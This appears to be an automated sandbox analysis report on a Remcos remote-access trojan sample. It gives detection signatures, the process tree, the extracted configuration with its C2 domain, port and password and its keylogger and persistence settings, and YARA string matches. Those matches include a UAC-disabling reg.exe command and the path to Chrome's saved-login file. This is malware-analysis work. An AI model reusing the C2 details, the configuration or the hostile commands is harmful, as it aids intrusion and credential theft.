
Analysis Report EXTRACTOSERFINANZA989543704031499704092798964.exe

Overview

General Information

Sample Name: EXTRACTOSERFINANZA989543704031499704092798964.exe
Analysis ID: 399743
MD5: 2e91e5e3d39ce4155edad4f2a3acf916
SHA1: 58adf5d60d9da823a4fd62282c0c46134e20e47b
SHA256: eb9e13fd092522e4dde08e96961117f9926e3ef70ca3b225f8c388e476541a21
Tags: exe, RAT, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to hide a thread from the debugger
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Country aware sample found (crashes after keyboard check)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SMSW)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locale information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name recorded in the version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Startup

  • System is w10x64
  • EXTRACTOSERFINANZA989543704031499704092798964.exe (PID: 6880 cmdline: 'C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe' MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • cmd.exe (PID: 7128 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6168 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • EXTRACTOSERFINANZA989543704031499704092798964.exe (PID: 6292 cmdline: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
      • wscript.exe (PID: 6548 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 3400 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PxxoServicesTrialNet1.exe (PID: 5772 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
            • cmd.exe (PID: 7004 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • timeout.exe (PID: 7056 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
            • PxxoServicesTrialNet1.exe (PID: 7068 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
            • PxxoServicesTrialNet1.exe (PID: 4480 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
            • WerFault.exe (PID: 6388 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1448 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • PxxoServicesTrialNet1.exe (PID: 6648 cmdline: 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe' MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • cmd.exe (PID: 5048 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1444 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • PxxoServicesTrialNet1.exe (PID: 6360 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • PxxoServicesTrialNet1.exe (PID: 6788 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • WerFault.exe (PID: 6596 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1476 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • PxxoServicesTrialNet1.exe (PID: 7144 cmdline: 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe' MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • cmd.exe (PID: 2240 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6224 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Remcos

{
  "Host:Port:Password": "databasepropersonombrecomercialideasearchwords.services:3521:uuo-qp",
  "Assigned name": "ArtilleriaRestore",
  "Connect interval": "1",
  "Install flag": "Enable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Disable",
  "Install path": "AppData",
  "Copy file": "PxxoServicesTrialNet1.exe",
  "Startup value": "MservicesOrg2",
  "Hide file": "Enable",
  "Mutex": "RemcosX2-Y057I8",
  "Keylog flag": "1",
  "Keylog path": "AppData",
  "Keylog file": "xlogs171.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "wikipedia;solitaire;",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5",
  "Audio path": "AppData",
  "Audio folder": "MicRecords",
  "Connect delay": "0",
  "Copy folder": "System32",
  "Keylog folder": "Runtime12",
  "Keylog file max size": "10000"
}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp | Remcos_1 | Remcos Payload | kevoreilly
    • 0x16510:$name: Remcos
    • 0x16888:$name: Remcos
    • 0x16de0:$name: Remcos
    • 0x16e33:$name: Remcos
    • 0x15674:$time: %02i:%02i:%02i:%03i
    • 0x156fc:$time: %02i:%02i:%02i:%03i
    • 0x16be4:$time: %02i:%02i:%02i:%03i
    • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp | REMCOS_RAT_variants | unknown | unknown
    • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
    • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x159e0:$str_b2: Executing file:
    • 0x16798:$str_b3: GetDirectListeningPort
    • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x16534:$str_b5: licence_code.txt
    • 0x1649c:$str_b6: \restart.vbs
    • 0x163c0:$str_b8: \uninstall.vbs
    • 0x1596c:$str_b9: Downloaded file:
    • 0x15998:$str_b10: Downloading file:
    • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
    • 0x159fc:$str_b12: Failed to upload file:
    • 0x167d8:$str_b13: StartForward
    • 0x167bc:$str_b14: StopForward
    • 0x16330:$str_b15: fso.DeleteFile "
    • 0x16394:$str_b16: On Error Resume Next
    • 0x162fc:$str_b17: fso.DeleteFolder "
    • 0x15a14:$str_b18: Uploaded file:
00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp | Remcos_1 | Remcos Payload | kevoreilly
      • 0x16510:$name: Remcos
      • 0x16888:$name: Remcos
      • 0x16de0:$name: Remcos
      • 0x16e33:$name: Remcos
      • 0x15674:$time: %02i:%02i:%02i:%03i
      • 0x156fc:$time: %02i:%02i:%02i:%03i
      • 0x16be4:$time: %02i:%02i:%02i:%03i
      • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

Unpacked PEs

Source | Rule | Description | Author | Strings
33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack | Remcos_1 | Remcos Payload | kevoreilly
        • 0x16510:$name: Remcos
        • 0x16888:$name: Remcos
        • 0x16de0:$name: Remcos
        • 0x16e33:$name: Remcos
        • 0x15674:$time: %02i:%02i:%02i:%03i
        • 0x156fc:$time: %02i:%02i:%02i:%03i
        • 0x16be4:$time: %02i:%02i:%02i:%03i
        • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
        • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
        • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x159e0:$str_b2: Executing file:
        • 0x16798:$str_b3: GetDirectListeningPort
        • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x16534:$str_b5: licence_code.txt
        • 0x1649c:$str_b6: \restart.vbs
        • 0x163c0:$str_b8: \uninstall.vbs
        • 0x1596c:$str_b9: Downloaded file:
        • 0x15998:$str_b10: Downloading file:
        • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
        • 0x159fc:$str_b12: Failed to upload file:
        • 0x167d8:$str_b13: StartForward
        • 0x167bc:$str_b14: StopForward
        • 0x16330:$str_b15: fso.DeleteFile "
        • 0x16394:$str_b16: On Error Resume Next
        • 0x162fc:$str_b17: fso.DeleteFolder "
        • 0x15a14:$str_b18: Uploaded file:
16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack | Remcos_1 | Remcos Payload | kevoreilly
          • 0x16510:$name: Remcos
          • 0x16888:$name: Remcos
          • 0x16de0:$name: Remcos
          • 0x16e33:$name: Remcos
          • 0x15674:$time: %02i:%02i:%02i:%03i
          • 0x156fc:$time: %02i:%02i:%02i:%03i
          • 0x16be4:$time: %02i:%02i:%02i:%03i
          • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

Sigma Overview

System Summary:

Sigma detected: Remcos
Source: Registry Key set | Author: Joe Security | Data: Details: ED 7B 37 DF 39 55 50 9B 55 9D 08 40 1D 41 4B D4 20 95 6C A2 D8 29 76 33 44 E7 95 ED A9 D3 02 30 B2 4C 86 FC 4B 2B 1E CE 8D AD 65 88 FB 0D AA 8F 2D 8F 33 21 AE D3 AD B9 0A A8 65 CD 72 78 4C C3 D1 F4 FB 00 C2 E7 08 86 C1 A6 B8 B7 D6 9E 3B 53 3D 90 59 1A CE 08 A5 CA 19 1A 22 2B 9A D8 22 36 6C 1E 09 FF 2B FD A7 DE 30 09 87 13 9D AD 22 F5 39 10 6B 62 68 CE 98 57 45 C7 2A 6F 32 DC 6F 74 14 85 F1 CF , EventID: 13, Image: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, ProcessId: 4480, TargetObject: HKEY_CURRENT_USER\Software\RemcosX2-Y057I8\exepath

Signature Overview

AV Detection:

Found malware configuration
Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack | Malware Configuration Extractor: Remcos {"Host:Port:Password": "databasepropersonombrecomercialideasearchwords.services:3521:uuo-qp", "Assigned name": "ArtilleriaRestore", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "PxxoServicesTrialNet1.exe", "Startup value": "MservicesOrg2", "Hide file": "Enable", "Mutex": "RemcosX2-Y057I8", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "xlogs171.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "System32", "Keylog folder": "Runtime12", "Keylog file max size": "10000"}
Multi AV Scanner detection for domain / URL
Source: databasepropersonombrecomercialideasearchwords.services | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe | ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe | ReversingLabs: Detection: 10%
Yara detected Remcos RAT
Source: Yara match | File source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
Source: Yara match | File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
Source: Yara match | File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
Source: Yara match | File source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
Source: Yara match | File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
Source: Yara match | File source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack | Avira: Label: BDS/Backdoor.Gen
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbH{ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721117453.000000000458B000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733685179.0000000004F2D000.00000004.00000001.sdmp
Source: Binary string: PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
Source: Binary string: ml.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: System.pdb99zz source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb> source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
